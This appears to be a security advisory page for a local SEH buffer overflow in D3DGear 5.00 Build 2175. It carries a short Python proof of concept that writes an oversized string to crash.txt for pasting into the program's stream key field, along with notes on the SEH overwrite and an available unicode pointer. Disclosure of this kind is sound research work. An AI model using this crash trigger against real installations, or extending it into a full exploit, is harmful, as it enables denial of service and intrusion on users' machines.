D3DGear 5.00 Build 2175 Buffer Overflow

2018.01.03
Credit: bzyo
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python # # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow # Date: 07-11-2017 # Vulnerable Software: D3DGear 5.00 Build 2175 # Vendor Homepage: http://www.d3dgear.com/ # Version: 5.00 Build 2175 # Software Link: http://www.d3dgear.com/products.htm # Tested On: Windows 7 x86 # # # PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key # # app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer # file = "crash.txt" buffer = "A"* 1284 + "B"*4 writeFile = open (file, "w") writeFile.write( buffer ) writeFile.close()


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top